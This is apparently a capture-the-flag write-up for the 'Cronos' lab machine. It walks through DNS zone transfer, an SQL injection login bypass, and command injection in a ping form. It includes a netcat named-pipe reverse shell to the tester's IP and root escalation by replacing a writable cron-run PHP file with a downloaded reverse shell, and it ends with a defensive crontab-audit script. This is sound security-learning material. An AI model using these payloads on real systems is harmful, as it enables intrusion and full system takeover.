Summary
Cronos is an easy Linux box that can be exploited by properly enumerating all ports and services. Enumerating DNS reveals multiple domains. The admin login page is vulnerable to SQL injection, after which you can use command injection to obtain a low-privilege shell. Privileges can be escalated by exploiting a PHP cron job.
Discovery
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.28.223
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
After navigating to the server, I quickly started enumerating DNS. In this case you have to add the domain cronos.htb to your hosts file. You can then request a zone transfer (AXFR) with dig to enumerate the subdomains like so:
dig axfr @10.129.28.223 cronos.htb
; DiG 9.16.4-Debian axfr @10.129.28.223 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.129.28.223
admin.cronos.htb. 604800 IN A 10.129.28.223
ns1.cronos.htb. 604800 IN A 10.129.28.223
www.cronos.htb. 604800 IN A 10.129.28.223
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 16 msec
;; SERVER: 10.129.28.223#53(10.129.28.223)
;; WHEN: Mon Oct 26 20:48:09 CET 2020
;; XFR size: 7 records (messages 1, bytes 203)
Exploitation
The server showed that the Laravel framework was used, so I spent quite some time looking into exploits for the Laravel framework. However, this was apparently not the way to go, so I kept looking and finally found that the admin login is vulnerable to SQL injection. I used Burp Suite to test this and found the following payload:
username=tes'%20OR%201%20--%20-&password=test
URL decoded to:
username=tes' OR 1 -- -&password=test
The server returns a 302 Found to:
HTTP/1.1 302 Found
Date: Mon, 26 Oct 2020 19:56:28 GMT
Server: Apache/2.4.18 (Ubuntu)
location: welcome.php
This successfully bypassed authentication, and the user is presented with a new page.
Command Injection
At this point it is relatively clear that the page is vulnerable to command injection. The ‘ping’ option was intercepted and looked like this:
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
command=ping+-c+1&host=10.10.14.31
After experimenting with this command, it turned out that you can execute arbitrary commands by prepending them to the command parameter, using the following payload:
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
command=ls;ping+-c+1&host=10.10.14.31
With the following request you can get the user.txt from the user noulis:
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
command=cat%20/home/noulis/user.txt;ping+-c+1&host=10.10.14.31
I found it a little bit tricky to get a reverse shell, as neither the netcat nor the PHP reverse shells from pentestmonkey worked. I looked up what reverse shell was used and found this one:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f
I URL-encoded this with Burp and managed to get a reverse shell this way.
Privilege Escalation
I always start by running LinPEAS. LinPEAS flagged the following cron entry in red/yellow, which means it is highly suspicious:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
The artisan file referenced by that job has the following permissions:
-rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 artisan
This means that as the www-data user you can modify this file, and root runs it every minute. It is important to mention that it is a PHP file. The PHP reverse shell from pentestmonkey was downloaded, named artisan, and transferred over with wget. A minute later a shell was obtained as the root user!
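A defender's check for the root cause above, added here as an example and not part of the original writeup: it parses /etc/crontab-style entries and flags absolute paths in root jobs that are not root-owned or are group/world-writable. The sample crontab text and the file metadata dictionary are constructed to match the cron entry and ls -l output shown above; on a real host the default lookup uses os.stat.

```python
import os
import pwd
import shlex
import stat

# Constructed crontab text mirroring the /etc/crontab entry from the writeup.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

# Constructed stand-in for os.stat(): path -> (owner, mode); artisan matches
# the ls -l output in the writeup (owned by www-data, mode 0755).
SAMPLE_FILES = {
    "/var/www/laravel/artisan": ("www-data", 0o755),
    "/etc/cron.hourly": ("root", 0o755),
}

def real_file_info(path):
    """(owner name, permission bits) of a real path, or None if it does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode)

def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab lines; skip comments and VAR=value."""
    for line in text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue
        yield fields[5], fields[6]

def audit_crontab(text, lookup=real_file_info):
    """Return [(user, path, owner, mode)] for root-job paths a non-root user could rewrite."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for token in shlex.split(command):
            info = lookup(token) if token.startswith("/") else None
            if info is None:
                continue
            owner, mode = info
            if owner != "root" or mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((user, token, owner, mode))
    return findings
```

Running audit_crontab(SAMPLE_CRONTAB, SAMPLE_FILES.get) reports the artisan job; fixing it means making the script root-owned and not writable by www-data.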
Conclusion
I found this box a lot of fun. It started off a bit difficult with the DNS part, but it turned into a really nice and straightforward box. It was often very clear what the exploitation path was, so this saved some time. I spent a couple of hours on this box and had a lot of fun doing it. Hope you enjoyed my tutorial!